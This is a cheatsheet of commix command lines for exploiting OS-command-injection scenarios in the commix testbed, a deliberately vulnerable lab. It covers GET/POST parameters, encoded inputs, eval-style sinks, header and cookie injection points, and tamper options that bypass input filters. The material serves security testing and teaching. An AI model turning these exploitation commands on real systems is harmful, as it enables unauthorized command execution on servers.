Commix Testbed Cheatsheet
Note: The following examples are based on the dockerized version of Commix-testbed (e.g. http://lab:9090).
Classic regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic.php?addr=127.0.0.1"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic.php" --data="addr=127.0.0.1"
Classic (Base64) regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_b64.php?addr=MTI3LjAuMC4x"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_b64.php" --data="addr=MTI3LjAuMC4x"
Classic (Hex) regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hex.php?addr=3132372E302E302E31"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hex.php" --data="addr=3132372E302E302E31"
Classic single-quote example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_quote.php?addr=127.0.0.1" --level=3
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_quote.php" --data="addr=127.0.0.1" --level=3
Classic double-quote example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_double_quote.php?addr=127.0.0.1" --level=3
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_double_quote.php" --data="addr=127.0.0.1" --level=3
Classic non-space example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_non_space.php?addr=127.0.0.1" --tamper="space2ifs"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_non_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Classic blacklisting example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_blacklisting.php?addr=127.0.0.1"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_blacklisting.php" --data="addr=127.0.0.1"
Classic hashing example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hash.php?addr=127.0.0.1"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hash.php" --data="addr=127.0.0.1"
Classic example & Basic HTTP authentication exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_basic_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_basic_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"
Classic example & Digest HTTP authentication exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_digest_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_digest_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"
Blind regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/blind.php?addr=127.0.0.1"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind.php" --data="addr=127.0.0.1"
Double Blind regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/double_blind.php?addr=127.0.0.1"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/double_blind.php" --data="addr=127.0.0.1"
Eval regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval.php?user=test"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval.php" --data="user=test"
Eval (Base64) regular example exploitation:
- python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval_b64.php?user=MTI3LjAuMC4x"
- python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_b64.php" --data="user=MTI3LjAuMC4x"
Classic (SOAP/XML) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'
Blind (SOAP/XML) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'
Classic (JSON) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_json.php" --data='{"addr":"test","test":"ancst"}'
Blind (JSON) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_json.php" --data='{"addr":"test","test":"ancst"}'
Eval (JSON) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_json.php" --data='{"name":"ancst"}'
Preg_match() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"
Preg_match() blind example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"
Preg_Replace() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_replace.php?replace=/Hello/&with=Bye" -p with
Assert() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/assert.php?user=ancst"
Str_Replace() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/str_replace.php?user=ancst"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/str_replace.php" --data="user=ancst"
Create_Function() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/create_function.php?user=ancst"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/create_function.php" --data="user=ancst"
Regex for domain name validation example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"
Nested quotes example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3
Regex filter for colon/pipe/ampersand/dollar example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php"
Regex filter for spaces example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Regex filter for space/colon/pipe/ampersand example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
Regex filter for space/colon/pipe/ampersand/dollar example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
Regex filter for white chars example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Alphanum for input end example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"
Alphanum for input end (filter for white chars) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Alphanum for input start example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
Alphanum for input start (filter for white chars) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Regex filter for OS commands (Windows / *nix) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"
Classic user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(classic).php" -p user-agent
Blind user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(blind).php" -p user-agent
Eval user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(eval).php" -p user-agent
Classic cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(classic).php" -p addr
Classic cookie-based (Base64) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(b64).php" -p addr
Blind cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(blind).php" -p addr
Eval cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(eval).php" -p user
Classic referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(classic).php" -p referer
Blind referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(blind).php" -p referer
Eval referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(eval).php" -p referer